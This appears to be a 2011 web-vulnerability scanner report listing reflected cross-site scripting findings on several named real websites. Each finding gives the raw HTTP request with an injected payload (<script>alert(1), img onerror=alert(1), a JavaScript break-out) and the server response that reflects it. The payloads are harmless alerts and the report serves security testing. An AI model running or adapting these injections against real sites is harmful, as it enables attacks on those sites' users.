GET /api/nai/status476fa<script>alert(1)< Host: www.addthis.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2COTUxMDFOQVV |
HTTP/1.0 404 Not Found Date: Sat, 17 Sep 2011 16:44:33 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1413 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Not found</title> <l ...[SNIP]... <strong>api/nai/status476fa<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.answerology |
Path: | /index.aspx |
GET /index.aspx?template=ads Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:27:51 GMT Content-Length: 1102 Connection: close Cache-Control: no-cache Expires: -1 Pragma: no-cache <html> <body width="728" height="90" style="margin:0;text <script type="text/javascript"> var segQS = parent.segQS; </script> <!-- begin 728x90 ad tag (tile=1) ...[SNIP]... <script language="JavaScript" src="http://ad.doubl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.answerology |
Path: | /index.aspx |
GET /index.aspx?template=ads Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 16:27:51 GMT Content-Length: 1147 Connection: close Cache-Control: no-cache Expires: -1 Pragma: no-cache <html> <body width="728" height="90" style="margin:0;text <script type="text/javascript"> var segQS = parent.segQS; </script> <!-- begin 728x90 ad tag (tile=1) ...[SNIP]... <a href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.chron.com |
Path: | /apps/adWiz/adWiz.mpl |
GET /apps/adWiz/adWiz.mpl?url Host: www.chron.com Proxy-Connection: keep-alive Referer: http://www.stamforda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:18 GMT Server: Apache/2.2.9 (Debian) Edge-control: cache-maxage=5m P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADM DEVa TAIa PSAa PSDa CONo OUR DELo IND PHY ONL INT STA DEM UNI COM NAV" Content-Type: application/x-javascript Accept-Ranges: bytes Cache-Control: public Age: 0 Expires: Sat, 17 Sep 2011 16:24:18 GMT x-cdn: Cotendo Connection: Keep-Alive Content-Length: 2260 /* adWiz.mpl cached on: Sat, 17 Sep 2011 11:23 CDT */ var OAS_sitepage = 'Not Used'; var OAS_listpos = 'Not Used'; var CiderJS = '11671'; var CiderAds = 'A728'; var OAS_query = ''; // pek: other value is //Look to see if we have set them before the dat file var CHRON_url = 'stamfordadvocate.com/beda0';f3e70677a7b'; CHRON_query ? OAS_query=CHRON_query : OAS_query = ''; /* set up the yahoo context targets */ adwiz.yahoo.context.tier = '0'; adwiz.yahoo.context.tag = 'Nil'; adwiz.yahoo.context / ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gather.com |
Path: | /426d8%3Cimg+src=a |
GET /426d8%3Cimg+src8a5a0><img%20src%3da Host: www.gather.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://burp/show/12 Cookie: gathersid=1025; ref=direct_www; __utma=185998783 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:06:29 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Content-Length: 17735 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <img src8a5a0><img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.gather.com |
Path: | /426d8%3Cimg+src=a |
GET /426d8%3Cimg+srcf3c43"><a>0ac9066e76d=a+onerror=alert(%22XSS Host: www.gather.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://burp/show/12 Cookie: gathersid=1025; ref=direct_www; __utma=185998783 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:06:29 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Content-Length: 17630 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <img+srcf3c43"><a>0ac9066e76d=a+onerror=alert("XSS")> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gather.com |
Path: | /426d8%3Cimg+src=a |
GET /88332<img%20src%3da Host: www.gather.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://burp/show/12 Cookie: gathersid=1025; ref=direct_www; __utma=185998783 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:06:51 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Content-Length: 17693 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <em>88332<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gather.com |
GET /URI+SYNTAX+EXCEPTION4a5f2<img%20src%3da Host: www.gather.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: gathersid=www06; ref=direct_www; __utma=185998783 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:05:14 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Content-Length: 17654 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <em>URI SYNTAX EXCEPTION4a5f2<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.gather.com |
GET /URI+SYNTAX+EXCEPTIONc01df"><a>6fe6341d71f HTTP/1.1 Host: www.gather.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: gathersid=www06; ref=direct_www; __utma=185998783 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:04:52 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Content-Length: 17569 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <meta name="keywordVal" content="URI+SYNTAX ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gather.com |
Path: | /a |
GET /a9de96<img%20src%3da Host: www.gather.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: gathersid=www06; ref=direct_www; __utma=185998783 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:05:18 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Content-Length: 17597 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <em>a9de96<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.gather.com |
Path: | /a |
GET /a79f87"><a>bbf6706713b HTTP/1.1 Host: www.gather.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: gathersid=www06; ref=direct_www; __utma=185998783 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:04:52 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Content-Length: 17512 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <meta name="keywordVal" content="a79f87"><a>bbf6706713b" > ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.gather.com |
Path: | /favicon.ico |
GET /c006e"><a>6572eb5d1d4 HTTP/1.1 Host: www.gather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=0E4D83820 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:35:50 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Content-Length: 17544 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <meta name="keywordVal" content="c006e"><a>6572eb5d1d4" > ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gather.com |
Path: | /favicon.ico |
GET /f755c<img%20src%3da Host: www.gather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=0E4D83820 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:36:13 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Content-Length: 17629 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <em>f755c<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.gather.com |
Path: | /global_andre.css |
GET /b4e35"><a>c331bbb36fa?18212 HTTP/1.1 Host: www.gather.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: gathersid=www06; ref=direct_www; __utma=185998783 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:06:36 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Content-Length: 17517 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <meta name="keywordVal" content="b4e35"><a>c331bbb36fa" > ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gather.com |
Path: | /global_andre.css |
GET /1912d<img%20src%3da Host: www.gather.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: gathersid=www06; ref=direct_www; __utma=185998783 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:06:58 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Content-Length: 17594 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <em>1912d<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.gather.com |
Path: | /peopleAreTalking.action |
POST /4e7c9"><a>d307891a060 HTTP/1.1 Host: www.gather.com Proxy-Connection: keep-alive Referer: http://www.gather.com/ Content-Length: 87 Origin: http://www.gather.com X-Prototype-Version: X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-type: application/x-www-form Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=0E4D83820 recentId=1688849889241963 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:37:02 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Content-Length: 17544 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <meta name="keywordVal" content="4e7c9"><a>d307891a060" > ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gather.com |
Path: | /peopleAreTalking.action |
GET /426d8<img%20src%3da Host: www.gather.com Proxy-Connection: keep-alive Referer: http://www.gather.com/ Origin: http://www.gather.com X-Prototype-Version: X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=0E4D83820 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:37:24 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Content-Length: 17647 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <em>426d8<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kampyle.com |
Path: | /feedback_form/ff |
GET /feedback_form/ff Host: www.kampyle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.local.com/ |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:58:48 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: FF_referrer_url Set-Cookie: FF_caller_url=aHR0cD Vary: Accept-Encoding Content-Length: 17904 Content-Type: text/html; charset=UTF-8 <?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org < ...[SNIP]... onclick="if (FFGlobalData() == true) { javascript:setSend() ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kampyle.com |
Path: | /feedback_form/ff |
GET /feedback_form/ff Host: www.kampyle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.local.com/ |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:58:33 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: FF_referrer_url Set-Cookie: FF_caller_url=aHR0cD Vary: Accept-Encoding Content-Length: 17904 Content-Type: text/html; charset=UTF-8 <?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org < ...[SNIP]... boldbuttons send" onclick="if (FFGlobalData() == true) { javascript:setSend() ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kampyle.com |
Path: | /feedback_form/ff |
GET /feedback_form/ff Host: www.kampyle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.local.com/ |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:01:35 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: FF_referrer_url Set-Cookie: FF_caller_url=aHR0cD Vary: Accept-Encoding Content-Length: 17907 Content-Type: text/html; charset=UTF-8 <?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org < ...[SNIP]... 7062200.1316295499.1.1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kampyle.com |
Path: | /feedback_form/ff |
GET /feedback_form/ff Host: www.kampyle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.local.com/ |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:59:33 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: FF_referrer_url Set-Cookie: FF_caller_url=aHR0cD Vary: Accept-Encoding Content-Length: 17967 Content-Type: text/html; charset=UTF-8 <?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org < ...[SNIP]... t:setSend();LoadCont ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kampyle.com |
Path: | /feedback_form/ff |
GET /feedback_form/ff Host: www.kampyle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.local.com/ |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:59:12 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: FF_referrer_url Set-Cookie: FF_caller_url=aHR0cD Vary: Accept-Encoding Content-Length: 17917 Content-Type: text/html; charset=UTF-8 <?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org < ...[SNIP]... , '0' : 'Select a relevant issue' }, 'mood1' : 'Negative', 'mood5' : 'Positive', 'feedbackFormTextarea' : '', 'multipleFeedback' : true}; function handleWindowChange(){ } FFSetTimeOnSite(10e5297;alert(1)/ FFSetStats('k_button_js var type_0; var type_1; var type_2; var type_3; var type_4; var type_5; var array_fb_types = new Array ('Bug','Site content','Suggestion', ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kampyle.com |
Path: | /feedback_form/ff |
GET /feedback_form/ff Host: www.kampyle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.local.com/ |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:59:08 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: FF_referrer_url Set-Cookie: FF_caller_url=aHR0cD Vary: Accept-Encoding Content-Length: 17967 Content-Type: text/html; charset=UTF-8 <?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org < ...[SNIP]... lobalData() == true) { javascript:setSend() ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kampyle.com |
Path: | /feedback_form/ff |
GET /feedback_form/ff Host: www.kampyle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.local.com/ |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:00:10 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: FF_referrer_url Set-Cookie: FF_caller_url=aHR0cD Vary: Accept-Encoding Content-Length: 17965 Content-Type: text/html; charset=UTF-8 <?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org < ...[SNIP]... loader', '/feedback_form/view ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kampyle.com |
Path: | /feedback_form/ff |
GET /feedback_form/ff Host: www.kampyle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.local.com/ |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:01:05 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: FF_referrer_url Set-Cookie: FF_caller_url=aHR0cD Vary: Accept-Encoding Content-Length: 17967 Content-Type: text/html; charset=UTF-8 <?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org < ...[SNIP]... %2F&utmz=177062200 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kampyle.com |
Path: | /feedback_form/ff |
GET /feedback_form/ff Host: www.kampyle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.local.com/ |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:01:20 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: FF_referrer_url Set-Cookie: FF_caller_url=aHR0cD Vary: Accept-Encoding Content-Length: 17967 Content-Type: text/html; charset=UTF-8 <?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org < ...[SNIP]... 77062200.1316295499.1.1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kampyle.com |
Path: | /feedback_form/ff |
GET /feedback_form/ff Host: www.kampyle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.local.com/ |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:00:49 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: FF_referrer_url Set-Cookie: FF_caller_url=aHR0cD Vary: Accept-Encoding Content-Length: 17967 Content-Type: text/html; charset=UTF-8 <?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org < ...[SNIP]... =k_button_js_revision ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.local.com |
Path: | /dart/ |
GET /dart/?ag=True&css Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=44c9c39a-4272-427f |
